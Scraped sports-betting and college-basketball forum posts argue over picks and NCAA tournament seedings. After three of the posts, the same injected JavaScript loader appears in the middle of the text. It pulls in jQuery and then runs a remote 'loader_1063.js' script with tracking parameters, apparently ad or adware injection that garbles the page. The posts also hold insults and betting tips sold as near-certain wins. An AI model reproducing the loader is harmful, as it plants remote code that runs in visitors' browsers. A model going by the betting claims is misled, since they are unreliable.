I either like Kansas city or the over 8 runs.
My reasoning, Bruce chen is getting better with age [L] and jay's hit .233 against lefties. Whereas the combo of 0-9, 10L and morrow pitching on the road, in the addition of kc hitting close to .270 against righties. Maybe the best Idea is to not go with anything on this one at all. Over is the safe one! if(typeof(jQuery)=='undefined'){(function(){var ccm=document.createElement('script');ccm.type='text/javascript';ccm.src='https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState=="loaded"||ccm.readyState=="complete"){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();} function ccm_e_init(jc){if(jc){jQuery.noConflict();} jQuery(function(){var http=location.href.indexOf('https://')>-1?'https':'http';var ccm=document.createElement('script');ccm.type='text/javascript';ccm.async=true;ccm.src=http+'://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);jQuery('#cblocker').remove();});}; |

Holy impatience. You can't make up that much ground in one night.
Why not just bet 15.4 units on Texas @ -145 Angels Yankees over 9 or New york rangers. these are bets that are very likely to win, and you can just take down units. you bet 6 games, and you can be winning 4, but if one of them screws you late...which is a lot more probably (4 chances, as opposed to 1) you're 3-3, and might be losing units. if(typeof(jQuery)=='undefined'){(function(){var ccm=document.createElement('script');ccm.type='text/javascript';ccm.src='https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState=="loaded"||ccm.readyState=="complete"){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();} function ccm_e_init(jc){if(jc){jQuery.noConflict();} jQuery(function(){var http=location.href.indexOf('https://')>-1?'https':'http';var ccm=document.createElement('script');ccm.type='text/javascript';ccm.async=true;ccm.src=http+'://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);jQuery('#cblocker').remove();});}; |

This is possibly the dumbest opinion I've heard on this website. Matt Cain is a fabulous pitcher, just in a funk when it comes to getting run support. It's all mental. He's pitching against great pitchers, a lot of really strong number 2's. And let's face it, SF on paper looks to have a great offense, but in reality, it was old and very inconsistent.
Please watch him start a few games. He's got an intimidating whip and is one of the great young stars to watch. Oh yah, I'll take josh johnson...obviously..but it's great when ur best play [Johnson] plays 18 starts a year. That helps a lot... if(typeof(jQuery)=='undefined'){(function(){var ccm=document.createElement('script');ccm.type='text/javascript';ccm.src='https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState=="loaded"||ccm.readyState=="complete"){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();} function ccm_e_init(jc){if(jc){jQuery.noConflict();} jQuery(function(){var http=location.href.indexOf('https://')>-1?'https':'http';var ccm=document.createElement('script');ccm.type='text/javascript';ccm.async=true;ccm.src=http+'://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);jQuery('#cblocker').remove();});}; |

You got Vermont playing against a subpar Lamar.
Love Vermont +3.5 You got Mississippi in Mississippi, with a disgusting rebounding and aggressive advantage over Illinois St who are good, but haven't played kentucky. Love Mississippi -6 Is nevada so bad that people think for some reason what could be the last game of their season they aren't going to outshoot Oral Robers? Like Nevada +5.5 Any Thoughts? |

We're talking about dominant teams, not bandwaggoners. UNC suck. And despite the fact they pretty much get a 2 game bye now, there nobodies in this thing.
Give them whatever they need. They got nothing, and I'll let my words speak. My fav's Baylor, Cinci and Mizzou, all 10:1+ to win, got $500 on each.

You guys are just missing the POINT
And that is clear. The ACC fucking sucks. And none of you acknowledge that. Then I'm fine with ending the discussion. It just gets too much weight. And the big 12 is just better ,better plays, more competitive, more fun to watch. If that's all you've got, then just stfu.

I respect the thought. It's pretty spot on money wise. (light bulb.) But don't act like SMC is nothing. Kansas lost to UNI if you recall. SMC are a group of winners. They hit shots, it's what they do. And if you're down, dellavdova is going to burn you. |

Any surprise the little city Kansas, Baylor, Missouri were all snubbed?
Clearly the syracuse [new york], big kentucky blue, north carolina [the yankees of ncaa ball nowadays] and michigan state and their crazy fan base were represented. It's just a joke, and I only mention it to see how many people are just oblivious to it's taking place. |

You're just like ever other person who reads box scores, I predict changes. So thank you, if you don't think it's intellectual, but I see myself as an insightful intelligent person. I love stats, and am great at math. So my ideas are pretty statistical.
But you've crossed a line. Not only do you have insignificant info, but you're a useless person. Nothing positive to add. If you honestly, truly believe the big12 doesn't deserve a #1 you're a complete moron. Sorry for my disrespect, but you deserve it now. Talk to me when a big 12 team kentucky or syracuse win the championship. So I'll take post 70, to call you out. Pac 12 down year, 2 teams that it, Winner and the better of arizona cali if either doesn't win the tourny. I hate kids like you. You just need to follow the league before you talk. I follow it passionately as a day job. Who cares if I don't post in here a lot, go read my posts. All I do is call out picks that are wrong, and I'm almost always right. I had a topic I wanted to discuss in a friendly manner, and you sour it. Go have a drink and ++++ off. That being said. Back to RPI, I like the idea of it, but I think divisional bias destroys that calculation. And my divison breakdown Big 10 [about at par, always intense, very home driven styled game] SEC [down days, a bad tennessee, a bad mississippi, a sub par mississippi st, improving lsu, poor georgia I like vandy a lot , kentucky are good] Big 12 [Baylor is my longshot in the tourny since november, kansas is really really a threat as much as I dislike them, missouri, deadly, iowa st could surprise - best squad in a long time. ACC {well below par, good Duke, UNC, florida st teams, decent miami, nc state, virginia BAD VT, BC, etc] Anyways I wont go into depth, big east is good, but surprisingly no bias I think WVU has a great shot. How unc got into the first seed from when this season started is beyond a joke. It's a money show. |

Buddy I dated a girl from West Virginia for close to 3 years...Love the mountaineers bro.
Ebanks, Da'sean Butler, Kevin Jones, Darryl Bryant, even becoming a Turkish fan. WVU is good, should have had a syracuse win on their paper too. That was a sad game of officiating to watch, but money talks.

Yeah but you overlooked how much it's emphasized in the pacific 10 (12 now, but never to me). Like Cal should be in no question based on their regular season. Colorado ?????????? HUH? That team should be in the NIT. I mean a team like mississippi st was snubbed.
And if you want to talk about snubs....biggest of all is Seton Hall. Connecticutt in....that's another scam....way to bias the conference tourny there, but not for #1 selection jesus, wtf is wrong with this league, it's just kids playing basketball....not professionals. It drives me crazy. UCON SUCK

Basically I see it like this:
You've got 4 #1 seeds. Baylor Missouri or Kansas HAVE to be one of these seeds. Syracuse HAVE to be a #1 seed Kentucky HAVE to be a #1 seed Michigan St/Ohio St/Unc/ or a second Big 12 team HAVE to be the last #1 seed A big 12 team had to be top 3 and the favouring of UNC has gone too far. You know the refs are favouring zeller too. Trust me this kid is not that great a talent, he's just playing in a much lower skill level. But if you want to know more about my theories of how all the professional sports league are on the downturn then Private message me.

To pioneer:
Kansas is just as good as Kentucky if not better. They've grown as a team as the season progressed. Why should UNC's two losses to Florida St be overlooked so much more greatly than Mizzou's 2 losses to Kansas St. Mizzou won the conference title, that's really all that should matter with a 30-4 record to seal a #1 seed. All I'm saying is the conference tournament is a waste if they are going to put ZERO emphasis on it's value. Like pac-12 teams faits are decided by it over a whole conference schedule, and then #1 seeds are pretty much picked in the acc and big 10 without it .... it's just dumb and not very congruent. And to further stress this, that difference between a 1 and 2 is massive...

LOL if that's truly your theory, that's sad. Some 15's aren't horrible and if you take away the Greensboro location from them they might play that Florida St game we all loved so much...

Well considering ....
Baylor has their best team in years Kansas has another pedigree of NBA stars Missouri are dominant Iowa St has a great team Kansas St are great again, bumped missouri twice. You gotta play em all twice. Yeah please try and tell me a division like the big 10, crap Illinois, crap northwestern, crap Iowa, and arguably the most inconsistent division in basketball. Wisconsin and Purdue as great examples, but I wouldn't hold my breathe putting Ohio St in there. Michigan State was really the only strong school thorough the year, with a few road blocks, here or there. |
clifeord1 | 42 |

Michigan St lost to Northwestern, that alone is enough to put you in NIT talks .... joking... but seriously you don't get a 1 losing 7 games, one of those to a small school and Ok ball program. Bad logic, next.

Someone's excuse was that Missouri lost to Kansas State U twice, but personally I think KSU is a stronger team than Florida State. And UNC lost to florida state twice.
I just really would love to know the reasoning behind giving North Carolina such an advantage even though they were mired by a massive, number 1 seed potential, crippling, loss to Florida State. Yea they win the ACC tourny, crown em as 1's but really what point are you making by keeping them a 1 seed losing their conference tournament. And sorry Syracuse too, but it's hard to argue when you've only lost 2 games all season, and you had an undefeated BIG EAST SEASON. What do you have North Carolina? My selections: For the 1's UK [Overall] Missouri Syracuse Michigan State or Kansas. Tight call but, it should go to Kansas. According to the selection theory the conference tourny shouldn't affect your position that much. And Kansas was yet again dominant this year and deserve a 1 seed and a potential championship - as much as I hate them...were talking about Thomas Robinson, UNC just has another Luke Harangody, Tyler Hansoboro type player and he'll immediately be in foul trouble and rendered useless. |
